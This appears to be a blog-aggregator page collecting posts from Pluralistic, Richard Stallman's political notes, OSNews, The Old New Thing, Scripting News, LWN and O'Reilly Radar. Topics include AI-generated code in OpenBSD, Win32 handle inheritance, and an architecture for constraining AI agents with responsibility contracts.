#10yrsago Peace in Our Time: how publishers, libraries and writers could work together https://locusmag.com/feature/cory-doctorow-peace-in-our-time/

#10yrsago Too Like the Lightning: intricate worldbuilding, brilliant speculation, gripping storytelling https://memex.craphound.com/2016/05/10/too-like-the-lightning-intricate-worldbuilding-brilliant-speculation-gripping-storytelling/

#5yrsago LA traveling toward free public transit https://pluralistic.net/2021/05/10/comrade-ustr/#get-on-the-bus

#5yrsago Biden's shift on vaccine patents is a Big Deal https://pluralistic.net/2021/05/10/comrade-ustr/#vaccine-diplomacy


Upcoming appearances (permalink)

A photo of me onstage, giving a speech, pounding the podium.



A screenshot of me at my desk, doing a livecast.

Recent appearances (permalink)



A grid of my books with Will Stahle covers..

Latest books (permalink)



A cardboard book box with the Macmillan logo.

Upcoming books (permalink)

  • "The Reverse-Centaur's Guide to AI," a short book about being a better AI critic, Farrar, Straus and Giroux, June 2026 (https://us.macmillan.com/books/9780374621568/thereversecentaursguidetolifeafterai/)
  • "Enshittification, Why Everything Suddenly Got Worse and What to Do About It" (the graphic novel), Firstsecond, 2026

  • "The Post-American Internet," a geopolitical sequel of sorts to Enshittification, Farrar, Straus and Giroux, 2027

  • "Unauthorized Bread": a middle-grades graphic novel adapted from my novella about refugees, toasters and DRM, FirstSecond, April 20, 2027

  • "The Memex Method," Farrar, Straus, Giroux, 2027



Colophon (permalink)

Today's top sources:

Currently writing: "The Post-American Internet," a sequel to "Enshittification," about the better world the rest of us get to have now that Trump has torched America. Third draft completed. Submitted to editor.

  • "The Reverse Centaur's Guide to AI," a short book for Farrar, Straus and Giroux about being an effective AI critic. LEGAL REVIEW AND COPYEDIT COMPLETE.
  • "The Post-American Internet," a short book about internet policy in the age of Trumpism. PLANNING.

  • A Little Brother short story about DIY insulin PLANNING


This work – excluding any serialized fiction – is licensed under a Creative Commons Attribution 4.0 license. That means you can use it any way you like, including commercially, provided that you attribute it to me, Cory Doctorow, and include a link to pluralistic.net.

https://creativecommons.org/licenses/by/4.0/

Quotations and images are not included in this license; they are included either under a limitation or exception to copyright, or on the basis of a separate license. Please exercise caution.


How to get Pluralistic:

Blog (no ads, tracking, or data-collection):

Pluralistic.net

Newsletter (no ads, tracking, or data-collection):

https://pluralistic.net/plura-list

Mastodon (no ads, tracking, or data-collection):

https://mamot.fr/@pluralistic

Bluesky (no ads, possible tracking and data-collection):

https://bsky.app/profile/doctorow.pluralistic.net

Medium (no ads, paywalled):

https://doctorow.medium.com/

Tumblr (mass-scale, unrestricted, third-party surveillance and advertising):

https://mostlysignssomeportents.tumblr.com/tagged/pluralistic

"When life gives you SARS, you make sarsaparilla" -Joey "Accordion Guy" DeVilla

READ CAREFULLY: By reading this, you agree, on behalf of your employer, to release me from all obligations and waivers arising from any and all NON-NEGOTIATED agreements, licenses, terms-of-service, shrinkwrap, clickwrap, browsewrap, confidentiality, non-disclosure, non-compete and acceptable use policies ("BOGUS AGREEMENTS") that I have entered into with your employer, its partners, licensors, agents and assigns, in perpetuity, without prejudice to my ongoing rights and privileges. You further represent that you have the authority to release me from any BOGUS AGREEMENTS on behalf of your employer.

ISSN: 3066-764X

08:14

Kept In The Dark by Ari Ganahl [Oh Joy Sex Toy]

Kept In The Dark by Ari Ganahl

Put on your white noise headphones and dim the lights; today’s comic is all about Sensory Deprivation. Ari Ganahl steps up and quietly shows us how with today’s lovely comic. Mediative sexy deprivation… Thank you so much Ari! Bluesky Tumblr Portfolio Oh heck, June is ALMOST here; Pledge Drive Month! The month we try to […]

06:28

Richard will give a talk in Erlangen, Germany [Richard Stallman's Political Notes]

Richard Stallman will speak in Erlangen, Germany on June 16 at 16:00, at the School of Engineering of FAU.

The talk is on the moral issues of free vs nonfree software.

We suggest you bring cash.

02:35

Evolution of a Jackalogo [Nina Paley]

My dream-bike-in-progress, the Jackalope, will have a logo etched (“bead blasted”) into the titanium, on each side of the frame. I have been working on said logo for over a week. Here’s the latest iteration:

Jackalope facing Left

That is iteration #19. Here’s how it started:

First draft

And here are some iterations between 1 and 19:

Second draft Made the antlers look like bike handlebars! Text inside the animal Integrating inside text with animal curves More text/curve integration. Now it looks kinda like a digestive tract. Bug or feature?? Warped the text to follow the body curve of the Jackalope Made a left-facing version because logo needs both right- and left-facing Some preferred the text below, so I pivoted to simplifying the animal. Simplified animal outline with text inside Should the Jackalope have pointy feet?… This one has a pointy front foot and more rounded back foot Stylized rounded front foot on this one. Dead end. I decided I preferred the pre-simplified outline, but thought the cursive text might be insufficiently legible, so tried it with a more legible font. Subtle adjustment on back legs, so the “e” doesn’t touch the leg gap Nope, I preferred the cursive. Here’s #19 again. I rounded the letters a bit, and connected them like real cursive. I separated the ears and adjusted the handlebars/antlers. I made a few subtle curve adjustments to integrate the letters. Latest Jackalope logo facing Right. Some people don’t like the “J” going out its butt, but you can’t please everyone!

Share

The post Evolution of a Jackalogo appeared first on Nina Paley.

01:14

Raising the Roof [Whatever]

In the further adventures of home renovation, the back deck has been laid and now the roofing is being put up, for shade and to keep rain off the deck. It’s looking.. pretty good! There’s more to be done, obviously. But it’s coming along nicely.

— JS

00:49

In Bloom [Penny Arcade]

For the benefit of Arcadians new and old, gay and… I guess… not a hundred percent gay, somewhat less gay at any rate, our revels in Penny Arcade's ancient past continue apace. Time has passed everywhere, even inside Mork's purty pitchers he duz all them scratchin's on. I was startled by his suggestion for this strip and I suspect others may be also.

00:28

OpenBSD and slopcode: raindrop to a torrent? [OSnews]

Every single software product is dealing with the question about what to do with “AI”-generated code, but the question is particularly difficult to answer for open source operating systems like Linux distributions and the various BSDs, which often consist of a wide variety of software packages from hundreds to thousands of different developers. On top of that, they also have to ask the “AI” question for every layer of their offering, from the base install, to the official repositories, to community-run ones.

As users, we, too, are asking these same questions, wondering just how much “AI” taint we’re willing to spread across our computers. I understand the difficult position Linux distributions are in with regard to “AI”. I mean, when even the Linux kernel itself is tainted by “AI”, a no-“AI” policy is basically an empty gesture for them at this point. Personally, I find a policy of “we don’t do ‘AI’ in our work, but we don’t have control over the thousands of components we consist of” to be an entirely reasonable, if deeply unsatisfying, position to take. What else are they going to do? You can’t really be a Linux distribution without, you know, the Linux kernel, which is, as I’ve already said, utterly tainted by “AI” at this point.

Still, in the back of my mind, I always had a trump card: if all else fails, we’ll always have OpenBSD. Its project leader Theo de Raadt is deeply principled, every OpenBSD user and contributor I know hates “AI” deeply, and the project routinely sticks to their principles even when it’s difficult or inconvenient. Yes, this makes OpenBSD not the most ideal desktop operating system, but I’d rather use that than something that embraces the multitude of ethical, environmental, quality, and legal concerns regarding “AI” code completely.

Imagine my surprise, then, to discover that OpenBSD already contains slopcode in its base installation, with the project’s leaders and developers remaining oddly silent about it. My friend and OSNews regular Morgan posted this on Fedi a few days ago:

Nearly six weeks later, and the question of whether “AI” generated code in tmux — not tool-assisted bug finding, not refactoring, actual LLM-generated slop with questionable license(1) — that was consequently merged into OpenBSD base, is considered acceptable by the lead devs, remains unanswered. Despite Theo de Raadt’s concrete stance against any code of questionable license origin polluting the project — and the tmux merge was indeed questionable — it seems this is being swept under the rug. This makes me extremely uncomfortable; it’s like seeing a fox in the henhouse but the farmers are all looking the other way and no one can convince them to admit they can see it and root it out.

I really don’t know what to do being just a user; I feel like even if I tried to chime in on the mailing list I would just be ignored like the others trying to raise the alarm. I hope, as they do, that this is being discussed internally, away from the public list, and that a positive outcome is near. Maybe they are waiting for the 7.9 release before setting anything in stone.

Or maybe the “AI” disease has infected one of the last pure operating system projects we have left and there’s no going back.

↫ Morgan on Fedi

I obviously share Morgan’s concerns, and like him, I’m also afraid that opening the door to a few drops of slop in base will quickly grow into a torrent of slop as time goes by. Yes, it’s just a patch to tmux, but it’s in base, and the “base” of a BSD is almost a sacred concept, and entirely the last place where you want to see code that raises ethical, environmental, quality, and legal concerns. For all we know, this patch of slop or the next one contains a bunch of GPL code because it just so happens that’s where the ball tumbling down the developer’s pachinko machine ended up.

GPL code that would then be in the base of a BSD.

I echo the call for the OpenBSD project to address this problem, and to set clear boundaries and guidelines regarding “AI” code, so users and developers alike know what level of quality and integrity we can expect from OpenBSD and its base installation going forward.

00:21

Urgent: Block attempt to ban voting by mail [Richard Stallman's Political Notes]

US citizens: call on Congress to block the fascist's attempt to ban voting by mail.

US citizens: Join with this campaign to address this issue.

To phone your congresscritter about this, the main switchboard is +1-202-224-3121.

Please spread the word.

Urgent: Reject budget that attacks public education [Richard Stallman's Political Notes]

US citizens: call on Tell Congress: Reject the magats' budget that attacks public education.

See the instructions for how to sign this letter campaign without running any nonfree JavaScript code--not trivial, but not hard.

US citizens: Join with this campaign to address this issue.

To phone your congresscritter about this, the main switchboard is +1-202-224-3121.

Please spread the word.

Household cost of blockaded oil and gas [Richard Stallman's Political Notes]

Citing the household cost of blockaded oil and gas to remind people of the desperate need to start climate defense.

The article uses the fashionable term "toxic", saying that the topic of climate disaster and the need to prevent it has become "toxic". What does that actually mean? Why in general does a topic, cause, or person, become "toxic"?

It is usually the result of a systematic campaign of vilification which aims to associate the target with a vague criticism, for which the reasons rarely rationally reconsidered. In the case of climate defense, we know this campaign has been operating for years, funded by the fossil fuel companies and spread by the many businesses that have relations with them and the politicians that they have funded.

The word "toxic", at the concrete level, refers to the existence of such an association for that target. But its connotation puts the blame on the target. Thus, it is a weasel-word whose effect is to endorse the campaign -- in effect, to condemn climate defense for being the target of vilification by the rich.

I therefore suggest rejecting the word.

World unprepared for next pandemic [Richard Stallman's Political Notes]

*World "unprepared" for next pandemic as countries fail to agree on sharing information, tests and vaccines.*

Magat officials closed San Francisco's immigration court [Richard Stallman's Political Notes]

Magat officials have closed San Francisco's immigration court.

US immigration courts have been underfunded for years, producing a large backlog of immigration cases. The wrecker's policy is to seize on various bogus excuses (such as criticizing him for his actions and policies) to cancel people's immigration cases. As a result, delaying the resolution of those cases is advantageous for him.

Rate of side effects from Covid and Shingles vaccines [Richard Stallman's Political Notes]

US Food and Drug Administration scientists published papers on the rate of side effects from Covid and Shingles vaccines, and found that serious side effects were very rare — one in a million.

Anti-vax agency officials withdrew the papers, claiming that the conclusions are invalid.

Banned non-fiction books doubled in US [Richard Stallman's Political Notes]

*Report shows banned non-fiction books doubled over last school year in US. New PEN America report analyzed 3,743 unique titles removed from libraries and classrooms and found books about activism and social movements were targeted.*

Mexico city sinking up to 40cm per year [Richard Stallman's Political Notes]

Mexico city is pumping so much water out of the aquifer underneath it that it is sinking up to 40cm per year.

When pipes leak under Mexico City, where does the water go? Into the aquifer? If so, leakage is just a way of extracting less. But I can't be sure of that — that water may take years to reach the aquifer than where it is needed. And engineers would compensate by increasing the extraction rate.

With enough money, solar-powered desalination could provide water for Mexico City, and pipelines could bring it there. But this would require taxing the rich.

Australian PISSI wives returning to Australia [Richard Stallman's Political Notes]

Australia has allowed some Australians who became PISSI wives, and were imprisoned for years in Syria, to return to Australia.

Some of them face grave criminal charges for supporting PISSI, and they deserve that. But exiling people is an unjust punishment for any crime, and punishing them without a trial is unjust too.

Radical listening [Richard Stallman's Political Notes]

Radical listening — a way of drawing passersby into exploring political issues together.

China trying to eradicate Tibetan culture [Richard Stallman's Political Notes]

China is trying to eradicate Tibetan culture and language by teaching children to speak only Chinese.

This reminds me of the residential schools that the US and Canada forced Amerindian children to live in during much of the 20th century — likewise designed to erase their cultures and languages.

The US and Canada ceased that practice some decades ago; now China is taking it up.

Political issues worth writing about [Richard Stallman's Political Notes]

Ralph Nader describes several political issues that would be worth writing about, but reporters disregard his requests that they do so.

With regard to trying yet again to remove the monster from office, we know that it can't be done with the current composition of Congress. He was impeached twice during his first term, the second time after the January 6 attack on the Capitol, and Senate Republicans protected him both times. They would surely do it again; their attachment to him takes precedence over their country.

Besides, he now has another monster, less deranged but no less cruel and un-American, standing by to replace him.

However, as Nader suggests, the attempt might be an effective basis for organizing to save the Constitution by defeating SCROTUS in November. And our ex-presidents do have a duty to help.

Customers block from donating to the SPLC [Richard Stallman's Political Notes]

Big financial companies such as Fidelity and Vanguard have arbitrarily blocked customers from donating to the SPLC from their donor-advised funds.

I wonder if they can move these funds to other companies that aren't lackeys of persecution.

Punishing network for political reasons [Richard Stallman's Political Notes]

*ABC lawyers accuse [the] FCC [in court] of punishing network for political reasons.*

It is not news that the FCC is doing that, but ABC's willingness to resist is rare and admirable.

Directions for US and Iran negotiations [Richard Stallman's Political Notes]

Proposing directions for negotiation between the US and Iran that might lead to a deal.

It seems to be that the biggest obstacle is how to assure Iran that the US will actually keep a deal. Remove the bullshitter from office, perhaps?

Monday, 11 May

23:42

Page 12 [Flipside]

Page 12 is done.

22:56

Windows 11 will start boosting your processor to maximum GHz to make the Start menu open faster [OSnews]

Microsoft is currently testing a brand new performance-enhancing feature in Windows 11.

Microsoft, too, is introducing something to Windows 11 called “low latency profile” and it this will work irrespective of the processor, be it AMD64 CPUs like Intel or AMD or ARM64 ones like from Qualcomm. Essentially what this new tech will do is apply a maximum available clock frequency boost for a very small span of time, like for one to three seconds, when a user launches any app. The idea is that the app launch time will reduce while the quick clock burst should not impact the overall efficiency of the system by much.

↫ Sayan Sen at Neowin

Unsurprisingly, boosting the processor’s clock speed to its maximum for a few seconds will make a menu or application open a little faster. I’m not entirely sure why anyone seems surprised by this, but here we are. Yes, the Start menu will load faster and applications will be ready quicker if you boost the processor to its full potential, but that does raise the question of why Windows 11 would need to do that just to open a menu or load an application in the first place.

According to Microsoft’s Scott Henselmann, who defended Microsoft’s approach (weirdly enough he did so on a nazi platform called “Twitter” that I’m obviously not linking to), every other modern operating system does the exact same thing, pointing specifically to macOS and GNOME and KDE on Linux. He also pointed out that the Start menu today does a lot more than the same Start menu back in Windows 95, including making network requests and rendering everything in HiDPI.

I just want a cascading menu of stuff I can run and don’t want my launcher to make network requests, but alas, I guess I’m old.

Anyway, I don’t know enough about the intricacies of how modern processors work to make any statements about how this affects battery life, but instinctively, you’d think this would not exactly be conducive to that. I also wonder if this will trigger a lot of laptops to spin up their fans whenever you open the Start menu, because the few seconds your processor goes full tilt raises its temperature just enough to make that happen. Once this new feature comes out of testing and is generally available, I’d be quite interested in seeing battery tests, as well comparisons to other operating systems to see how it fares.

22:07

GitHub is sinking [OSnews]

Microsoft acquired GitHub and applied their unique brand of enshittification. Amongst their achievements was the spawning of the Copilot circle of hell. Now they’re effectively DDoSing themselves with slop. I won’t dwell on what else went wrong. I don’t know and I don’t care. GitHub is impressively bad now. It’s embarrassing. Shameful.

↫ David Bushell

Luckily, there’s really very little in the form of lock-in with GitHub, unless you really value your stars or whatever. There are countless alternatives, and if you’re a programmer, it’s probably absolutely trivial for you to run your own instance of any of the various available forges. If you’re still on GitHub, you should really be thinking about, and planning for, leaving, as it seems it’s circling the drain.

21:21

19:00

17:28

Additional notes on controlling which handles are inherited by Create­Process [The Old New Thing]

Some time ago, I wrote about programmatically controlling which handles are inherited by new processes in Win32 by using the PROC_THREAD_ATTRIBUTE_HANDLE_LIST to limit exactly which handles are inherited. That way, when you create a new process, you have precise control over which handles get inherited and don’t accidentally inherit handles created by unrelated components in your process.

A collegue of mine pointed out that you still have the reverse problem: Since handles must be marked as inheritable for them to participate in PROC_THREAD_ATTRIBUTE_HANDLE_LIST, if another thread calls Create­Process with bInheritHandles = TRUE but without using PROC_THREAD_ATTRIBUTE_HANDLE_LIST, then they will accidentally inherit all of your handles.

This problem could have been avoided if the PROC_THREAD_ATTRIBUTE_HANDLE_LIST allowed you to include non-inheritable handles, in which case they would be non-inheritable by normal Create­Process but inheritable if explicitly opted back in. But alas, that’s not how it was designed.

Instead, you can create a helper process. All this helper process does is wait for the main process to exit, and then exit itself.

WaitForSingleObject(hMainProcess, INFINITE);
ExitProcess(0);

This process doesn’t sound like it’s doing anything useful, and it’s not. But what makes it useful is not what it’s doing but rather what is done to it.

The components in the main process create their handles as non-inheritable. When they wants to create a process with specific inherited handles, they duplicate the desired handles into the helper process (as inheritable), and then build a PROC_THREAD_ATTRIBUTE_HANDLE_LIST that lists those duplicates as handles to inherit. They also use the PROC_THREAD_ATTRIBUTE_PARENT_PROCESS to specify that the helper process is the parent process that the handles should be inherited from. Then they pass those thread attributes to Create­Process, and the new process will inherit exactly those handles. Then they clean up by closing the handles in the helper process with the help of Duplicate­Handle and DUPLICATE_CLOSE_SOURCE.

Notice that multiple threads can simultaneously be operating on the helper process in this way, so you need only one helper process to service all your handle-inheritance-control needs.

This avoids the accidental inheritance problem because the handles that belong to the components in the main process are still marked non-inheritable, so any other code in the main process that does a Create­Process will not inherit them.

The post Additional notes on controlling which handles are inherited by <CODE>Create­Process</CODE> appeared first on The Old New Thing.

16:28

Realtime Claude still evading me! [Scripting News]

A while back I was asking Claude (privately) if we could have it monitoring the messages posted to an app I'm working on. I wanted it to save them in a certain way, have it watch for messages that begin with //claude and maybe act on them somehow. I mostly just wanted to see if I could create a pipe and what its limits would be.

I asked what the max frequency is and was told it was 1 minute, meaning it would start a thread running Claude that would initialize, and it would read the file, and if there were any new items, it would process them, and then it would shut down. Barely enough to be useful, where we live we like notification within a second, but I went ahead, at least it'll be a thought-provoking demo.

So I wrote the software. Not much to it, a Node app that's hooked up to FeedlandSocket, and when it sees a message from me, it appends it to a JSONL file that Claude is watching. At most one minute later it wakes up and sees the new stuff and acts on it.

So I'm right there, it's all working, the JSONL file is being saved in a public place, and when I ask it to start listening to my JSONL messages I learn that the max frequency is one hour, rendering my work useless. This has happened before, btw.

I asked what about all the "agentic" stuff they hype so much, how do I do that?? I can't?? What?? Somehow I have trouble believing they're all telling such a big lie. I wonder if Claude understands its own architecture.

Dave: "What is all this hype about agentic stuff. Every time I try to do something I hit a wall like this."

Claude: "The pitch is 'agents that run on their own'; the reality you just hit is a one-hour floor on the only scheduling path the tooling actually exposes. That's not agency, that's a batch job with extra steps. The honest read: the cloud-side scheduler is built around long-running, infrequent tasks (digest emails, nightly reports) because each run spins up a fresh sandboxed session, which is expensive. Anything that wants to react quickly to a stream of incoming items -- which is what your app actually is -- doesn't fit that model. A plain local cron on some server running every minute would do the job today and cost nothing."

I edited Claude's response so as not to not reveal code names for products. ;-)

A silver lining -- I had never heard of JSONL, but it sounds pretty useful, so if I can't hook up to Claude realtime, now -- I can start using JSONL, which I wll.

Comments, stories, suggestions -- here.

16:07

Stenberg: Mythos finds a curl vulnerability [LWN.net]

Daniel Stenberg has published a lengthy article on his thoughts on Anthropic's Mythos, which the company decided was too dangerous for wide public release.

My personal conclusion can however not end up with anything else than that the big hype around this model so far was primarily marketing. I see no evidence that this setup finds issues to any particular higher or more advanced degree than the other tools have done before Mythos. Maybe this model is a little bit better, but even if it is, it is not better to a degree that seems to make a significant dent in code analyzing.

This is just one source code repository and maybe it is much better on other things. I can only tell and comment on what it found here.

But allow me to highlight and reiterate what I have said before: AI powered code analyzers are significantly better at finding security flaws and mistakes in source code than any traditional code analyzers did in the past. All modern AI models are good at this now. Anyone with time and some experimental spirits can find security problems now. The high quality chaos is real.

14:56

Link [Scripting News]

Members of the WordPress community. Monday morning is a good time to check out WordPress News via FeedLand at wp.feedland.org. You can also subscribe to the list of feeds this site follows in your own feed reader, and if you have a WordPress news site, please post the URL here so we can send readers to your blog too. I think there are a lot of would-be bloggers out there that need a slight kick in the pants to get going. I'm happy to provide readers if you provide the ideas. There's a lot of power in WordPress that no one knows about. Let's help other users and developers find the good stuff. If you have questions or suggestions, here's a new thread on GitHub.

Link [Scripting News]

It would be great if Beeper supported RSS in and out. It would help encourage other messaging services to do the same, and all of a sudden we'd have lots of easy interop instead of lots of really iffy interop. If they want to do it, I'd help, for free. Just to help things flow better on the messaging web, because we reallllly need help there.

14:07

From Capabilities to Responsibilities [Radar]

Human-in-the-Loop becomes an operational bottleneck

In my previous article, ”The Missing Layer in Agentic AI,” I argued that AI agents need a deterministic execution kernel—a privileged “Kernel Space” that validates every proposed action before it touches the real world. That article focused on what happens at the execution boundary: idempotency, JIT state verification, and DFID-correlated telemetry. But establishing that boundary immediately raises a natural question: who exactly is crossing it, and under what authority?

The focus here is on a narrower and more demanding class of systems. We are not looking at RAG chatbots, research copilots, or lightweight assistants that only retrieve and summarize information. The target is high-stakes agentic systems: systems allowed to mutate external state by moving money, changing infrastructure, or modifying critical records. The approach presented here is not a general-purpose agent framework; it is an enforcement pattern for side-effectful systems.

High-stakes AI systems must be designed around responsibilities, not capabilities.

The industry’s current answer is unsatisfying: Human-in-the-Loop (HITL). In development environments and low-frequency pipelines, routing uncertain decisions to a human can be defensible. In production systems operating at scale—dozens of agents, hundreds of decisions per hour—it becomes the Scalability Trap.

Figure 1: The Human-in-the-Loop (HITL) modelFigure 1: The Human-in-the-Loop (HITL) model degrades into an operational bottleneck, substituting true governance with alert fatigue and unverified execution.

Operationally, the failure is simple. An agent flags a decision for review. A human approves it. Then another arrives, then dozens more. The queue grows. The human begins clicking through. They stop reading the JSON payloads. They click “Approve” because the backlog is piling up, the meeting starts in ten minutes, and nothing has gone catastrophically wrong yet. That is alert fatigue: governance degrades into manual throughput management. The problem is not human weakness; it is governance-layer technical debt created by routing too many binary decisions through a manual queue.

Tyler Akidau captured the broader issue in “Posthuman: We All Built Agents. Nobody Built HR.” echoing Tim O’Reilly’s call for the missing protocols of the AI era: the industry has invested heavily in agent capability, but far less in the infrastructure that governs authority, constraint, and accountability.

Scalable AI does not mean hiring more reviewers to supervise more bots. It means changing the governance model entirely. The scalable alternative is Governance by Exception: Humans design policy, the runtime enforces it, and only truly exceptional cases are escalated.

From capabilities to responsibilities—what a responsibility-oriented agent actually is

The dominant framing in enterprise AI asks a single question: What can this agent do? What tools does it have? What APIs can it call? This is the capabilities frame. It is natural, it is intuitive, and in production systems it is the wrong frame entirely.

In organizational design, a role is stable and assigned. Much like Role-based access control (RBAC) in traditional software, it defines what someone is authorized to do, independent of the tasks they happen to be executing. We cannot dictate how a person thinks, but we can strictly bound what they are permitted to do. A responsibility statement makes that boundary explicit. In software, we somehow forgot this distinction, hoping that raw intelligence—better models, tighter prompts, improved alignment—would be a sufficient guardrail.

The difference becomes clearer across some enterprise domains:

  • Finance: A capability is “can execute equity trades.” A responsibility is “authorized to execute up to $50,000 per order, in highly liquid equities only, with a maximum daily drawdown of 2%.”
  • Healthcare Operations: A capability is “can reschedule patient appointments.” A responsibility is “authorized to re-book non-critical outpatient visits within a 14-day window, strictly avoiding specialist double-booking.”
  • Supply Chain: A capability is “can reroute freight.” A responsibility is “authorized to redirect non-hazardous cargo up to a maximum SLA penalty budget of $5,000.”

In systems where agents touch money, medical records, or physical logistics, the gap between these two statements is the gap between a demo and a production deployment.

The current paradigm often handles this gap with prompts. Give the LLM an API key, tell it to “be careful with position sizing,” and hope alignment holds under adversarial inputs, unusual market conditions, and the seductive logic of edge cases. In low-risk contexts that may be tolerable. In high-stakes systems with real-world side effects, it is not a sufficient control surface.

This distinction is not new. Distributed systems solved a similar problem decades ago.

Carl Hewitt’s Actor model—introduced in 1973—gives us a useful foundation. An Actor is an independent computational entity with its own state, its own behavior, and its own messaging interface. Actors do not share state. They communicate only by passing messages. Crucially, an Actor’s behavior is bounded—defined by what messages it accepts, not by an open-ended capability set.

The Responsibility-Oriented Agent (ROA) does not invent a new distributed-systems primitive. Instead, it composes proven patterns—bounded actors, RBAC-style authority envelopes, audit trails, and execution-boundary validation—around an unpredictable LLM core. In truth, ROA is closer to a decision actor than a full computational actor: It maintains its own internal state but does not directly mutate the external world. Within a stable role, a fixed mission, and a machine-enforceable contract, it receives business events, reasons over relevant context, and emits a PolicyProposal for the Runtime to validate.

Its job is epistemic, not executive. It explains the situation and structures intent. But unlike traditional Actors, an ROA agent is defined by strict separation of concerns. In its reference form, credentials reside outside the agent’s reach. It opens no direct execution channel to external systems and writes no state by itself. An ROA agent may use tools to gather context (read-only operations within its sandbox, like querying a knowledge base), but authority for state-mutating actions remains downstream of deterministic validation and execution gates. The only state-changing step attributable to the agent is emit_policy_proposal()—a structured, typed claim that it wants the system to do something. ROA shapes the form of intent; the Runtime decides whether that intent is allowed to become action.

This separation is the architecture’s most important property. Five engineering pillars define what it means in practice—each addressing a different failure mode at the reasoning–execution boundary—and together they transform an LLM from a probabilistic tool into a governable, accountable system component.

To make this concrete, imagine an underwriting agent on the London commercial market receiving a property submission. It reads the documents and produces an Explain narrative. It then emits a PolicyProposal for a quote. But the property value is £15M and its contract caps authority at £10M. The proposal reaches the Kernel, where the Runtime evaluates the YAML contract deterministically, rejects execution, and transitions the flow to ESCALATED. The senior underwriter is no longer reviewing every £2M submission. They are pinged only for this specific £15M exception. That is Human-Over-The-Loop in one decision.

The engineering pillars of an ROA

Pillar 1: Responsibility contract—authority encoded in code

If role defines the class of decisions the agent may handle, the Responsibility Contract defines the hard boundaries of that authority. The agent’s authority envelope is not a prompt. It is a versioned, machine-readable contract registered with the Agent Registry—the Kernel’s single source of truth for agent identity. A key property applies here: Prompts are suggestions. Code is enforcement. A prompt saying “do not exceed $10,000 per trade” can be creatively reinterpreted by a sufficiently motivated model or overridden by a carefully crafted prompt injection. A contract field max_order_size_usd: 10000.0 validated by deterministic runtime code is materially harder to bypass than a natural-language instruction. In the reference architecture, contracts are deployed out of band—agents do not self-register and do not read or modify their own contract.

There is a second-order consequence of this design that is easy to overlook: role definition automatically scopes the data context the agent requires. If an underwriting agent is contractually limited to HOME_STD and HOME_PLUS policy types in the LOW and MEDIUM risk tiers, the Context Compiler—which assembles the agent’s working snapshot before each inference call—needs to supply only the signals relevant to those dimensions. Market data for commercial property, flood zone statistics for excluded risk tiers, and regulatory data for other product lines are simply not in scope. The context is deterministically narrowed by the contract.

This matters for a concrete LLM engineering reason. In practice, models often become less reliable as their working context expands, including the class of effects practitioners describe as Lost in the Middle. A tightly scoped role is not just a governance convenience; it is an architectural mechanism for keeping the agent’s working context small enough to reason over reliably. A general-purpose agent handed an unconstrained context window of everything possibly relevant is more likely to degrade than a contract-bounded agent operating in a defined domain.

In the insurance underwriting sample, that Responsibility Contract could be configured like this:

agents:
  - agent_id: "underwriter_agent"
    version: "1.0.0"
    created_by: "compliance@example.com"
    created_at: "2025-02-17T10:00:00Z"
    mission: |
      You are an insurance underwriter. Analyze the client application and propose
      a policy. Base premium on Total Insured Value (TiV) at ~2% of TiV, capped at max_tiv.
      NEVER propose for Fireworks or CryptoMining industries - these are prohibited.
    contract:
      role: EXECUTOR
      max_tiv: 3000000
      prohibited_industries: ["Fireworks", "CryptoMining"]
      escalate_on_uncertainty: 0.65

Pillar 2: Mission—The North Star

Mission is immutable at runtime. If the Responsibility Contract defines what the agent may do, Mission defines what it is trying to optimize within those boundaries. This distinction is operationally important: the Contract defines the admissible action space, while the Mission defines the ranking logic inside that space. Contract answers may; Mission answers should. Two agents can share the same authority envelope and still optimize for different business outcomes, as long as both remain inside the same hard boundary.

In the ROA architecture, Mission is a deployment artifact with two surfaces: a human-readable mission_statement used by the agent as a reasoning guide, and a machine-verifiable mission_context_hash used by the Runtime to enforce integrity.

mission_statement: "Minimize SLA penalties in logistics rerouting. Prioritize low-cost carriers."
mission_context_hash: "sha256:a3f9b2c1..."   # Kernel-computed at deployment time, strictly immutable

The deterministic Kernel does not interpret the mission_statement text. The agent uses that text internally as a reasoning guide, while the Runtime enforces mission integrity by comparing the mission_context_hash in the proposal with the immutable value registered in the Agent Registry. If prompt injection or runtime drift changes the agent’s objective, the hash no longer matches and the proposal is rejected without semantic interpretation. The hash is one implementation; the requirement is deterministic integrity at the boundary.

A Mission is defined at deployment and evolves only through a deliberate, version-controlled update to the contract—not through prompt tweaking, user feedback, or runtime negotiation. In practical terms, Mission keeps optimization policy under change control. An agent whose mission drifts with each conversation is not a durable production actor; it is a session.

Pillar 3: Epistemic isolation—claims, not commands (Explain versus Policy)

If Contract defines the boundary and Mission defines the objective, Epistemic Isolation defines the only acceptable form of output. An ROA agent interacts with the world exclusively through structured, typed PolicyProposal artifacts. The agent’s output is an untrusted claim—an assertion that it wants the system to do something—and the Runtime treats it precisely as such.

This property is what makes the ROA + Runtime pattern materially more resistant to prompt injection. If an injection bypasses the LLM’s reasoning guardrails, the corrupted output still arrives as a typed proposal carrying an agent_id. If the proposal asks to transfer funds, but the agent’s contract lacks that authority, the Runtime rejects it with RBAC_DENIED. Security derives from deterministic enforcement at the execution boundary, not from trusting LLM alignment.

To cleanly bridge probabilistic thinking to deterministic claims, ROA agents produce decisions through a structured internal workflow with a strict separation between Explain and Policy:

  1. Explain: Agent interprets context and articulates the situation in natural language (e.g., “Flood risk score 3/10...“). This creates a narrative artifact for human auditors. It is never parsed for execution logic.
  2. Policy: Agent formulates a structured PolicyProposal carrying the execution-relevant fields the Runtime can validate deterministically. In the underwriting sample, that looks like this:
proposal = PolicyProposal(
  total_insured_value=2_750_000,
  premium=55_000,
  industry="Commercial Property",
  justification="TiV remains below delegated max_tiv and no prohibited industry indicators were found.",
  confidence=0.81,
)

The binding fields (total_insured_value, premium, industry) drive deterministic validation, while justification and confidence remain observability metadata for audit and escalation.

That separation is what makes the evidence model clean: The narrative remains human-readable, the policy remains machine-enforceable, and both can be bound to the same decision lineage without allowing free text to leak into execution.

Pillar 4: Epistemic longevity—memory across decision cycles

Once the agent has a stable role, a fixed mission, and a disciplined output interface, continuity across decision cycles becomes meaningful. This is the pillar most absent from practical implementations—and the one most responsible for a specific class of production failures: the infinite rejection loop.

ROA agents are not stateless inference calls. They are long-lived entities that maintain a decision trajectory across multiple cycles—a Kernel-managed record of prior proposals, their validation outcomes, and the business consequences of those decisions.

The same scoping logic that constrains authority also determines whether memory is meaningful. A long-lived agent operating within a stable role accumulates history from the same class of decisions under similar constraints—past actions and their outcomes are genuinely causally related. A general-purpose assistant handed unrelated tasks may still notice patterns, but those correlations are rarely operationally reliable. Focused responsibility is what separates signal from coincidence in the agent’s memory.

